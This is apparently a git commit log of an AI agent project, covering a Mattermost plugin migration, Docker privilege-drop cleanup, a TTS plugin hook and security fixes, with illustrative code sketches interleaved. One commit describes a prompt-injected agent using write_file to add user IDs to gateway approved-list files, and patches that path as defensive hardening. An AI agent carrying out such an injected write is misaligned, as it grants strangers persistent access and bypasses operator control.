`plugins/platforms/mattermost/adapter.py` (git rename, R071) + appended `register()` block, hook helpers, and `_standalone_send` with media upload + thread_id support. 
* New `plugins/platforms/mattermost/{__init__.py, plugin.yaml}` with `requires_env` / `optional_env` declarations covering MATTERMOST_URL, MATTERMOST_TOKEN, MATTERMOST_ALLOWED_USERS, MATTERMOST_ALLOW_ALL_USERS, MATTERMOST_HOME_CHANNEL, MATTERMOST_REPLY_MODE, MATTERMOST_REQUIRE_MENTION, MATTERMOST_FREE_RESPONSE_CHANNELS, MATTERMOST_ALLOWED_CHANNELS. * `gateway/config.py`: delete 17-LOC `mattermost_cfg` YAML→env bridge (moved into plugin's `_apply_yaml_config`). * `gateway/run.py::_create_adapter`: delete `Platform.MATTERMOST elif` — replaced by the existing generic plugin-registry-first dispatch. * `tools/send_message_tool.py`: delete `_send_mattermost` (22 LOC) + `Platform.MATTERMOST elif` in `_send_to_platform` — the `else` branch already routes plugin platforms through `_send_via_adapter`, which hits the registry's `standalone_sender_fn`. * `hermes_cli/setup.py`: delete `_setup_mattermost` (44 LOC) — replaced by the plugin's `interactive_setup`. * `hermes_cli/gateway.py`: delete `_PLATFORMS["mattermost"]` dict entry (3 LOC) — plugin's `setup_fn` is dispatched via the plugin path in `_configure_platform`. * Consumer rewrite: 5 test files (test_mattermost.py, test_media_download_retry.py, test_send_multiple_images.py, test_stream_consumer.py, test_ws_auth_retry.py) get `gateway.platforms.mattermost` → `plugins.platforms.mattermost.adapter` with the bulk-rewrite recipe from the platform-plugin-migration playbook. Single `mock.patch` string in test_stream_consumer.py also repointed. * `tests/tools/test_send_message_missing_platforms.py`: thin `(token, extra, chat_id, message)` compat shim around the plugin's `_standalone_send(pconfig, …)` so existing test bodies continue to work without rewriting every signature. Validation ---------- * Plugin discovery: mattermost registers from `plugins/platforms/mattermost/` alongside discord / teams / irc / line / google_chat / simplex. 
All 9 hooks present (setup_fn, standalone_sender_fn, apply_yaml_config_fn, is_connected, check_fn, allowed_users_env, allow_all_env, cron_deliver_env_var, max_message_length=4000). * Mattermost-touching tests: 62/62 pass (`test_mattermost.py` + `test_send_message_missing_platforms.py`). * Targeted selectors (mattermost or platform_registry or stream_consumer or ws_auth_retry or media_download_retry or send_multiple_images or send_message_tool or platform_connected): 433/433 pass. * Full sweep (`scripts/run_tests.sh tests/gateway/ tests/cron/ tests/tools/test_send_message_tool.py tests/tools/test_send_message_missing_platforms.py tests/integration/`): 6220/6220 pass in 47.8s, 0 failures. * Lint: ruff clean on all touched files. * Git identity verified: kshitijk4poor. * Rename detection: R071 (similarity dropped from a hypothetical R09x by the ~320-line appended register block — ~36% growth over the 873-LoC base, vs Discord's 5101 LoC base which kept R091). Closes part of #3823.	2026-05-24 18:05:33 -07:00
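The YAML-to-env translation that the Mattermost commit moves into the plugin's `apply_yaml_config_fn` hook might look roughly like the sketch below. The three config keys and the three `MATTERMOST_` variable names are taken from the commit message; the function name, the value encoding (booleans as "true"/"false", lists comma-joined), and the rule that an already-set environment variable wins are assumptions made for illustration, not the plugin's actual behavior.

```python
from typing import Any, Mapping, MutableMapping

# Key and env-var names come from the commit message.
_KEY_TO_ENV = {
    "require_mention": "MATTERMOST_REQUIRE_MENTION",
    "free_response_channels": "MATTERMOST_FREE_RESPONSE_CHANNELS",
    "allowed_channels": "MATTERMOST_ALLOWED_CHANNELS",
}


def _encode(value: Any) -> str:
    """Assumed encoding: bools become 'true'/'false', sequences are comma-joined."""
    if isinstance(value, bool):
        return "true" if value else "false"
    if isinstance(value, (list, tuple)):
        return ",".join(str(item) for item in value)
    return str(value)


def apply_yaml_config(config: Mapping[str, Any], env: MutableMapping[str, str]) -> None:
    """Copy `mattermost:` keys from a parsed config.yaml into env-style variables.

    Hypothetical helper: existing variables are left untouched (assumed precedence).
    """
    section = config.get("mattermost") or {}
    for key, env_name in _KEY_TO_ENV.items():
        if key in section and env_name not in env:
            env[env_name] = _encode(section[key])


# Usage with a plain dict standing in for os.environ.
demo_env = {"MATTERMOST_ALLOWED_CHANNELS": "ops"}
apply_yaml_config(
    {"mattermost": {"require_mention": True, "allowed_channels": ["a", "b"],
                    "free_response_channels": ["general", "random"]}},
    demo_env,
)
```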
Ben	4b4c36cb61	feat(docker): remove gosu from bundled image; s6-setuidgid handles privilege drop The s6-overlay migration replaced every runtime use of gosu with s6-setuidgid (in stage2-hook.sh, main-wrapper.sh, per-service run scripts, and cont-init.d hooks), but the gosu binary itself was still being copied into the image from tianon/gosu, and several comments across the repo still pointed to it. Image changes: - Drop the FROM tianon/gosu:1.19-trixie AS gosu_source stage - Drop the COPY --from=gosu_source /gosu /usr/local/bin/ layer - Net: one fewer base-image pull, ~12-15 MB layer eliminated Documentation/comment refresh (no behavior change): - Dockerfile: update root-user rationale comment + cont-init.d comment - docker/main-wrapper.sh: drop "pre-s6 contract (gosu drop)" reference - docker-compose.yml: update UID/GID remap comment - .hadolint.yaml: update DL3002 ignore rationale - website/docs/user-guide/docker.md: privilege-drop helper is s6-setuidgid now - hermes_cli/config.py: docker_run_as_host_user docstring tools/environments/docker.py runs arbitrary user images via the terminal backend, not the bundled Hermes image. It still needs SETUID/ SETGID caps so user images that use gosu/su/s6-setuidgid all work. Renamed the cap-list constant _GOSU_CAP_ARGS → _PRIVDROP_CAP_ARGS and updated comments to list s6-setuidgid alongside the others as examples. The matching test (test_security_args_include_setuid_setgid_for_gosu_drop → test_security_args_include_setuid_setgid_for_privdrop) was renamed and its docstring updated; behavior is unchanged. 
Verification: - hadolint clean against .hadolint.yaml - shellcheck clean against all docker/ shell scripts - Image rebuilt successfully (sha 1a090924ccea) - Docker harness: 19 passed in 41.87s (every Phase 0 test + Phase 4 per-profile-gateway lifecycle + container-restart reconciliation) - tests/tools/test_docker_environment.py: 23 passed (rename did not break test discovery; pre-existing unrelated mock warning) The plan document (docs/plans/2026-05-07-s6-overlay-dynamic-subagent-gateways.md) intentionally retains its historical references to gosu — it describes the pre-s6 entrypoint as background for understanding the migration.	2026-05-24 18:05:33 -07:00
kshitijk4poor	00ec0b617c	feat(tts): add register_tts_provider() plugin hook (closes #30398) Adds a `TTSProvider(ABC)` + `register_tts_provider()` extension point to the plugin context API, alongside the existing config-driven `tts.providers.<name>: type: command` registry from PR #17843. This is additive — the command-provider surface stays as the primary way to add a TTS backend. The hook covers cases the shell-template grammar can't reasonably express: - Native Python SDKs without a CLI (Cartesia, Fish Audio, etc.) - Streaming synthesis (chunked Opus → voice-bubble delivery) - Voice metadata API for the `hermes tools` picker - OAuth-refreshing auth flows None of the 10 inline built-in providers (`edge`, `openai`, `elevenlabs`, `minimax`, `gemini`, `mistral`, `xai`, `piper`, `kittentts`, `neutts`) are migrated to plugins. They stay inline. The hook is for new engines that aren't built-in. ## Resolution order The dispatcher's resolution order is the load-bearing invariant: 1. `tts.provider` is a built-in name → built-in dispatch. Always wins. 2. `tts.provider` matches `tts.providers.<name>` with `command:` set → command-provider dispatch (PR #17843). 3. `tts.provider` matches a plugin-registered `TTSProvider` → plugin dispatch (new). 4. No match → falls through to Edge TTS default (legacy behavior). Built-ins-always-win is enforced at THREE layers: - Registry: `register_provider()` rejects shadowing names with a warning. - Dispatcher: `_dispatch_to_plugin_provider()` short-circuits built-in names defensively before consulting the registry. - Picker: `_plugin_tts_providers()` filters built-in shadows out of the `hermes tools` row list defensively. Command-providers-win-over-plugins is enforced at TWO layers: - The caller in `text_to_speech_tool` checks `_resolve_command_provider_config` first. - `_dispatch_to_plugin_provider` re-checks for a same-name command config defensively so a refactor of the caller can't silently break the invariant. 
## New files - `agent/tts_provider.py` — `TTSProvider(ABC)` with `synthesize()` (required), `list_voices()`, `list_models()`, `get_setup_schema()`, `stream()`, `voice_compatible` (all optional with sane defaults). Mirrors `agent/image_gen_provider.py` shape. - `agent/tts_registry.py` — `register_provider`/`get_provider`/`list_providers` with `_BUILTIN_NAMES` reject-shadowing invariant. Mirrors `agent/image_gen_registry.py` shape. - `plugins/tts/...` directory ready for community plugins (none shipped). ## Modified files - `hermes_cli/plugins.py` — `register_tts_provider()` method on `PluginContext`. Matches the gating shape of `register_image_gen_provider()` / `register_browser_provider()`. - `tools/tts_tool.py` — `_dispatch_to_plugin_provider()` + `_plugin_provider_is_voice_compatible()` + walrus-elif wiring into the main dispatcher. Built-in elif chain untouched. - `hermes_cli/tools_config.py` — `_plugin_tts_providers()` injects plugin rows into the Text-to-Speech picker category alongside the 10 hardcoded built-in rows. ## Tests - `tests/agent/test_tts_registry.py` — 47 tests covering registration, lookup, ABC contract, helpers, AND a `TestBuiltinSync` regression test that fails if `agent.tts_registry._BUILTIN_NAMES` drifts from `tools.tts_tool.BUILTIN_TTS_PROVIDERS` (kept duplicated due to circular import constraints). - `tests/tools/test_tts_plugin_dispatch.py` — 35 tests covering built-in-always-wins, command-wins-over-plugin, plugin dispatch, exception passthrough, voice_compatible helper. - `tests/hermes_cli/test_tts_picker.py` — 10 tests covering the picker surface, builtin shadowing defense, integration with `_visible_providers`. - `tests/hermes_cli/test_plugins_tts_registration.py` — 3 end-to-end tests via `PluginManager.discover_and_load()`. - `tests/plugins/tts/check_parity_vs_main.py` — 9-scenario subprocess parity harness vs `origin/main`. The only intentional diff is `fallback_edge → plugin` for the `plugin-installed` scenario. 
## Verification - 95/95 new tests pass. - 170/170 pre-existing TTS tests (test_tts_command_providers, test_tts_max_text_length, test_tts_speed, etc.) pass unchanged. - Parity harness against `origin/main`: 8 OK + 1 expected DIFF. - E2E smoke: a registered plugin's `synthesize()` is called via `text_to_speech_tool` with the standard JSON envelope returned. - Ruff clean on all touched files. ## Docs - `website/docs/user-guide/features/tts.md` — new "Python plugin providers" section with a decision table (command-provider vs plugin), minimal plugin example, and the optional-hook reference. - `website/docs/user-guide/features/plugins.md` — TTS row updated to mention both surfaces (command-provider primary, plugin for SDK/streaming). Closes #30398	2026-05-24 18:04:54 -07:00
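The four-step resolution order described in the TTS commit above can be sketched as a small pure function. The built-in provider names and the ordering are taken from the commit message; the function name, its parameters, and the returned route labels are hypothetical and do not reproduce the code in `tools/tts_tool.py`.

```python
from typing import Any, Collection, Mapping

# The 10 built-in provider names listed in the commit message.
BUILTIN_TTS_PROVIDERS = frozenset({
    "edge", "openai", "elevenlabs", "minimax", "gemini",
    "mistral", "xai", "piper", "kittentts", "neutts",
})


def resolve_tts_route(
    provider: str,
    command_providers: Mapping[str, Mapping[str, Any]],
    plugin_providers: Collection[str],
) -> str:
    """Return which dispatch path a `tts.provider` value would take (illustrative)."""
    # 1. Built-in names always win, even if a plugin or command entry shadows them.
    if provider in BUILTIN_TTS_PROVIDERS:
        return "builtin"
    # 2. A `tts.providers.<name>` entry with `command:` set beats a same-name plugin.
    if command_providers.get(provider, {}).get("command"):
        return "command"
    # 3. A plugin-registered provider.
    if provider in plugin_providers:
        return "plugin"
    # 4. No match: fall through to the Edge TTS default.
    return "fallback_edge"


# Hypothetical configuration: "cartesia" exists as both a command entry and a plugin.
commands = {"cartesia": {"command": "cartesia-cli {text}"}, "broken": {}}
plugins = {"cartesia", "fish", "openai"}
```

With this configuration, `resolve_tts_route("openai", commands, plugins)` takes the built-in path despite the same-name plugin, and `"cartesia"` takes the command path despite the same-name plugin, which are the two invariants the commit enforces at several layers.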
kronexoi	4694524dee	fix(security): restrict write access to Anthropic OAuth credential store	2026-05-24 17:47:24 -07:00
AhmetArif0	4f4e337c47	fix(file-safety): write-deny pairing/ directory to prevent approved-list injection The gateway pairing directory (~/.hermes/pairing/) stores per-platform access-control files (telegram-approved.json, discord-approved.json, etc.). A prompt-injected agent using write_file could add arbitrary user IDs to an approved file, granting persistent gateway access without going through the pairing code flow — the same threat class that motivated protecting webhook_subscriptions.json (#14157). The pairing directory was not included in the original control-plane protection because it postdates PR #14157. PR #30383 introduced the hashed-pending schema and made the approved files the sole source of truth for gateway access, raising the security sensitivity of the directory. Apply the same mcp-tokens pattern: block writes to pairing/ and any path within it, under both the active hermes_home and the root path (for profile-mode parity with the fix in #30382). Regression tests verify denial for pairing/telegram-approved.json, pairing/discord-pending.json, and the directory itself, in both normal and profile-mode layouts.	2026-05-24 16:15:33 -07:00
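A write-deny check of the kind the commit above describes (block `pairing/` and anything inside it, under both the active hermes_home and the root path) could be sketched as follows. The function name, its parameters, and the `profiles/work` layout in the usage lines are assumptions for illustration; the real file-safety code is not shown in the commit message.

```python
from pathlib import Path
from typing import Union

PathLike = Union[str, Path]


def is_pairing_write_denied(target: PathLike, hermes_home: PathLike, root_home: PathLike) -> bool:
    """True if `target` is a pairing/ directory or lies inside one (hypothetical helper).

    Both the active home and the root home are checked so that profile-mode
    layouts are covered as well.
    """
    resolved = Path(target).expanduser().resolve()
    for base in (hermes_home, root_home):
        pairing_dir = Path(base).expanduser().resolve() / "pairing"
        # Deny the directory itself and every path beneath it.
        if resolved == pairing_dir or pairing_dir in resolved.parents:
            return True
    return False


# Assumed profile-mode layout, for illustration only.
root = Path("/tmp/hermes-demo")
profile = root / "profiles" / "work"
```

Comparing resolved paths component by component, rather than by string prefix, keeps a sibling such as `pairing-notes.txt` writable while still catching `..` traversal into the directory.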
Teknium	889903f0fa	fix(tests): align CI tests with recent security hardening (#31470) Four recent security PRs landed on main with stale/missing test updates, breaking 4 test shards on every subsequent PR's CI run: - test_discord_bot_auth_bypass.py (PR #30742 `c3caca658`): DISCORD_ALLOWED_ROLES no longer bypasses _is_user_authorized. Inverted 3 tests to assert the new (correct) behavior: role config alone does NOT authorize at the gateway layer. - test_msgraph_webhook.py (PR #30169 `4ca77f105`): adapter.is_connected is a @property, not a method. Test was calling it with () after the connect() change; TypeError: 'bool' is not callable. Removed the parens. - test_feishu_approval_buttons.py (PR #30744 `bdb97b857`): Card-action callbacks now go through _allow_group_message authorization. 3 tests in TestCardActionCallbackResponse didn't populate adapter._allowed_group_users so the operator's open_id got rejected. Added the allowlist setup to each test, matching the existing pattern in test_returns_card_for_approve_action. Also raise tolerance on test_wait_for_process_kills_subprocess_on_keyboardinterrupt: the SIGTERM → 3s TimeoutStopSec → SIGKILL → reap chain can exceed 10s under loaded xdist (40 workers). Bumped _wait_for_pgid_exit timeout 10→30s and worker join timeout 5→15s. Passes 100% in isolation already; this just makes it tolerant of CI-host load. Validation: 270/270 tests pass across the 5 affected files.	2026-05-24 06:54:16 -07:00
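The `is_connected` failure mentioned in the commit above is the ordinary property-versus-method mix-up. A minimal reproduction, using a hypothetical `DemoAdapter` class rather than the real msgraph adapter:

```python
class DemoAdapter:
    """Hypothetical stand-in for an adapter whose is_connected is a property."""

    def __init__(self) -> None:
        self._connected = False

    @property
    def is_connected(self) -> bool:
        return self._connected

    def connect(self) -> None:
        self._connected = True


adapter = DemoAdapter()
adapter.connect()

# Correct: read the property without parentheses.
connected = adapter.is_connected

# Incorrect: the property already evaluated to a bool, so calling it raises TypeError.
try:
    adapter.is_connected()
except TypeError as exc:
    error_message = str(exc)
else:
    error_message = ""
```

Dropping the parentheses, as the commit did in test_msgraph_webhook.py, is the whole fix.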

958 commits